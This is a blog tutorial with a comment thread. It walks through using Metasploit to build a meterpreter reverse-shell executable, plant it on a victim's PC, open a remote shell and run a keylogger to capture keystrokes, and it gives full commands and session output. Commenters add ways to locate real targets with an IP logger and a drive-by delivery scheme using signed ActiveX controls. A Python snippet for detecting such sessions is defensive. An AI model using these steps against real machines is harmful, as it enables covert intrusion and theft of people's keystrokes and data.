Metasploit Tutorial - With an example | Exploiting the vulnerabilities
Posted by Aneesh M. Makker at 5:40 AM / Categories: metasploit /
--- The Metasploit Framework ---
Note: This is an advanced topic. Read carefully. Feel free to ask any kind
If you are really interested in network security, chances are you must have heard of Metasploit over the last few years. Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise because of even a simple reason like not updating your Flash player last week when it prompted you to do so. Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking. The topic of Metasploit is very vast in itself. However, I'll try keeping it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack). In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine. Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them):

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond its size. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.

Now, what IS Metasploit? It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits; it can also be used to write our own 0-day exploits.
METASPLOIT ANTI FORENSICS: Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester's P0V. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously. I would recommend doing the following things in Metasploit on a Backtrack system or image, avoiding the Windows version of the tool. For those who don't know, Backtrack is a Linux distro made especially for security personnel, including all the tools required by a pentester. Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than 1 system, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin: Open up Backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Password: toor

Type the following to start the wicd network manager:
root@bt:~# /etc/init.d/wicd start
Finally, type "startx" to start the GUI mode:
root@bt:~# startx
First of all, find your local IP. Open a konsole (on the bottom left of the taskbar) and type:
root@bt:~# ifconfig
It will be something like 192.168.x.x or 10.x.x.x. Make a note of it. Now launch msfconsole by going to Applications >> Backtrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole
You should now have a shell similar to a command prompt in Windows:
msf >
Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window ("Session >> New Shell", or click the small icon to the left of the shell tab in the bottom left corner of the window) and run:
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444. (Everything has to be entered without quotes.) You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, you would now see a reverse_tcp.exe file on your Backtrack desktop.
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it and type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you, and now you have set the meterpreter handler to listen on port 4444. The last step is to type in "exploit" and press enter:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now the handler is listening for all incoming connections on port 4444. Once the executable runs on the victim, you will see:
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like this:
meterpreter >
Type in ps to list the active processes:
meterpreter > ps
Search for explorer.exe and migrate to that process:
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger on the victim, just type keyscan_start.
Now, if you want to go to the victim's computer, just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You would now have a command prompt. Type in whoami to see the computer name and user name of the victim:
C:\Windows\system32>whoami
win7-pc\win7
C:\Windows\system32>
Let's suppose you want to start notepad on the victim's computer. Type in:
Let's say the victim has typed anything on his computer.
Just type exit to return to meterpreter. Now type keyscan_dump to see all the typed keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...
GaM3 0V3R
P.S.: The above information is for educational purposes only. You should test it only against a computer you own.
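From the defender's side, the session above leaves a visible trace: after "migrate 5716", explorer.exe (a desktop process that has no reason to talk to the network) holds an established outbound TCP connection to the handler's port 4444. The following Python script is an added example, not code from the original post, that flags such connections in netstat-style records; the sample records, the PID-to-process map, and the two allowlists are constructed assumptions modelled on the page's scenario.

```python
import re
from dataclasses import dataclass

# Constructed "netstat -ano"-style sample: the first line mirrors the page's
# session (192.168.255.1:62853 -> 192.168.255.130:4444) owned by PID 5716,
# which is explorer.exe after the migrate step. Other lines are benign noise.
NETSTAT_SAMPLE = """\
TCP    192.168.255.1:62853    192.168.255.130:4444   ESTABLISHED     5716
TCP    192.168.255.1:49731    52.96.0.10:443         ESTABLISHED     3120
TCP    192.168.255.1:49802    192.168.255.5:445      ESTABLISHED     4
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
"""
# Constructed PID -> image name map (what "tasklist" would give you).
PROCESS_NAMES = {5716: "explorer.exe", 3120: "outlook.exe", 4: "System", 812: "svchost.exe"}

# Assumed allowlists: desktop processes that normally hold no outbound TCP
# sessions, and remote ports that are routine for desktop software.
NO_NETWORK_EXPECTED = {"explorer.exe", "notepad.exe", "winlogon.exe"}
COMMON_PORTS = {53, 80, 443, 445}

LINE_RE = re.compile(r"^TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)$")


@dataclass(frozen=True)
class Finding:
    pid: int
    process: str
    remote_ip: str
    remote_port: int
    reasons: tuple


def find_suspicious(netstat_text, process_names):
    """Return a Finding for every ESTABLISHED connection that breaks a rule."""
    findings = []
    for raw in netstat_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m or m.group(5) != "ESTABLISHED":
            continue  # skip listeners and lines we cannot parse
        remote_ip, remote_port, pid = m.group(3), int(m.group(4)), int(m.group(6))
        proc = process_names.get(pid, "unknown")
        reasons = []
        if proc in NO_NETWORK_EXPECTED:
            reasons.append("process does not normally open network connections")
        if remote_port not in COMMON_PORTS:
            reasons.append(f"uncommon remote port {remote_port}")
        if reasons:
            findings.append(Finding(pid, proc, remote_ip, remote_port, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(NETSTAT_SAMPLE, PROCESS_NAMES):
        print(f"PID {f.pid} ({f.process}) -> {f.remote_ip}:{f.remote_port}: {'; '.join(f.reasons)}")
```

On the sample, only the explorer.exe connection to port 4444 is reported, with both reasons attached.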
About the author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise includes online privacy issues, web application security and wireless hacking. You can connect with him on Facebook here.
46 comments:
Anonymous Posted at: March 16, 2011 6:25 AM
this looks complicated but interesting...:)
Anonymous Posted at: March 16, 2011 6:27 AM
nice one!
Priyanshu Posted at: March 16, 2011 6:32 AM
Nice Post Bro Keep It Up...!!
qwerty Posted at: March 16, 2011 9:31 AM
what do u mean by the 2 versions vmware and ISO? m running kubuntu 10.10..can i install it? which would u suggest?
Saiprasad Posted at: March 17, 2011 10:35 PM
hey u have kept on telling what to do but how much time will it need for newbie to be able to start exploiting himself?
Aneesh M. Makker Posted at: March 17, 2011 11:47 PM
Thanks everybody. @qwerty vmware is a virtualization software. You can run multiple operating systems on the same machine. You dont need the dual booting. You can use Backtrack on your current operating system using the backtrack vmware image. ISO image is meant to be burned on a disk and you can install it. Use this if you dont want to run backtrack on your current os. @Saiprasad You need to explore a lot. It requires a lot of time..
Anonymous Posted at: March 18, 2011 11:20 AM
Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking forums? Such as hackforums.net.
Aneesh M. Makker Posted at: March 20, 2011 2:16 PM
Yeah, Sometimes
Ashu Posted at: April 25, 2011 8:32 AM
Thanks for awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get the IP Address of target system?
Adi Posted at: May 1, 2011 3:33 AM
Yes, it would work over the Internet too. To get the IP, one thing you can do is to use an IP logger PHP script, host it on a free webhost, and ask the user to visit that link. It may sound a little complicated, but trust me, it's really simple. Good Luck!
Maverick Posted at: June 1, 2011 11:48 AM
Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!
Anonymous Posted at: June 9, 2011 11:22 AM
[email protected] here is my msn
Adi Posted at: June 17, 2011 4:54 AM
The metasploit unleashed is a good place for a newbie to start. Here's the link
cy60rg4sm Posted at: July 8, 2011 3:00 AM
nice post bro.. keep it up.. but i want to know is there any change in the codes for backtrack 5????
roy Posted at: July 12, 2011 8:16 PM
This one is done in a vm, but how to carry out this in a real world situation, should i first port forward or dmz my vm (bt) machine then use my local ip or my external ip. could u please shed some light on doing this in a real world situation
How to Become a Computer Hacker Posted at: July 27, 2011 6:48 PM
Metasploit seems insanely complicated, thanks for making it that little bit clearer! This can be applied to servers, it's insane how insecure things are!
Anonymous Posted at: August 14, 2011 4:34 AM
Friends feel free to copy the articles by asking the admin as these articles have also been taken from various other websites. . .
Anonymous Posted at: August 15, 2011 2:10 AM
How can i copy the .exe file into a thumb drive in BT4...???
Anonymous Posted at: August 29, 2011 9:21 AM
Great Job Bro
pavan kumar Posted at: September 10, 2011 2:33 PM
am using metasploit 3.7 version n this procedure is not working out : ( what do i do ??
Hii Posted at: September 22, 2011 5:35 AM
hi frndz help me plz its all going well & i got a session also but some problem like
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
dats it... its not going more,,, when i type session -l it shows command not found... plz helppppp
Anonymous Posted at: October 15, 2011 12:45 PM
Great job ! Bdw, backtrack is a complex thing - why u didn't write installation procedure ? dual boot ? windows 7 ? USB backtrack usage ? Ubuntu ? kindly, tell me about it !!!!! Thanks in advance sami
Abhishek Posted at: November 4, 2011 2:47 AM
anyone who wants to learn hacking or how to use metasploit commands in unix, mail me or chat with me at
[email protected]
Sandeep Posted at: November 24, 2011 2:52 AM
Is all of the above possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?
Almas Malik Posted at: December 7, 2011 8:37 AM
Nice Informative Post!! Bloggers needed for Hacking Exposed [almashackingtutorials.blogspot.com] If interested mail me at almas.
[email protected]
Anonymous Posted at: December 17, 2011 9:32 AM
well. i am kinda new to metasploit. I can understand most of it but i have a question. why do we have to copy the payload file? Cant we inject it into the target?
Feorhc Posted at: January 3, 2012 10:59 PM
nice articles, keep it up bro
Anonymous Posted at: February 10, 2012 11:20 AM
Very Nice Article : Can you Post some windows 7 ultimate , basic version exploit ... xD thanks ..
Anonymous Posted at: February 14, 2012 6:49 AM
Will this method work on a public network ?
Anonymous Posted at: February 17, 2012 8:57 PM
nice one, but explain in backtrack 5
Anonymous Posted at: February 21, 2012 3:52 AM
you all are fools except two, one me and the second one is the owner of this web page !!
Anonymous Posted at: February 21, 2012 10:03 PM
excellent article.. very kewl,, Its truly appreciated
ztobs Posted at: February 25, 2012 7:06 AM
i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it. i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with ubuntu. how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os,
Anonymous Posted at: February 26, 2012 11:52 AM
I get an error- metasploit 3 directory doesnt exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.
premkumar Posted at: March 14, 2012 10:46 PM
it's all about your hard work and some knowledge, if you try to get in someone's pc, it takes 100 tries and only one might succeed...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.
Anonymous Posted at: March 19, 2012 5:43 PM
This won't work for real, are people really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you. 99% of the time the machines on the net are behind firewalls which means requirement one is out!
This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass. If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server 2) Build the exact reverse of this example with Meta, so that the exe connects to you when ran, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an ActiveX control, or if you're not that good, make it a ClickOnce... 3) Get a VPS anonymously and setup the listener, setup a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections. 4) put the Signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there. 5) Sit on your VPS, or a hacked one, and wait... That's a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. That's right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suckz. 3dge3lite
Anonymous Posted at: March 25, 2012 1:15 AM
can backtrack be used to get computer information from an ISP server, if we have the public ip of the ISP ? thanks for help,
[email protected]
Steven van Stiphout Posted at: March 28, 2012 12:04 AM
very nice tutorial, and clearly intended for pen testing purposes as well. People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a
the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entry point gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vulnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!
SS Posted at: March 30, 2012 2:21 AM
I cannot migrate to the winlogon.exe process. It says: Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges) How can I get around that? The machine I'm attacking is running windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).
chatur Posted at: April 9, 2012 3:37 AM
surfing with proxy websites and IP spoofing are the same techniques ? if not, why are proxy websites constructed ? if any hacker uses a proxy website for cyber crime, will he/she not be traced ?????? hope that you'll reply me !!!!
chatur Posted at: April 9, 2012 4:39 AM
is there any difference b/w these 2 prompts in BT root@bt: and root@root: when I work in root@bt: all konsole functions work but in root@root it doesnt work.. even I couldnt find
metasploit framework in root@root... how to fix this problem ???? plz help me.
Anonymous Posted at: April 11, 2012 4:31 AM
Ok now author I'm using windows7 on my laptop and I heard that there is some dual os or something like that. is it possible for me to have both Linux and windows on the same laptop? if this is possible how can I go about doing it. Please mail me to:
[email protected]
Anonymous Posted at: April 11, 2012 10:50 AM
This isn't exploiting a vulnerability.
jaydipsinh Posted at: April 12, 2012 3:27 AM
such a nice post... gr8 :))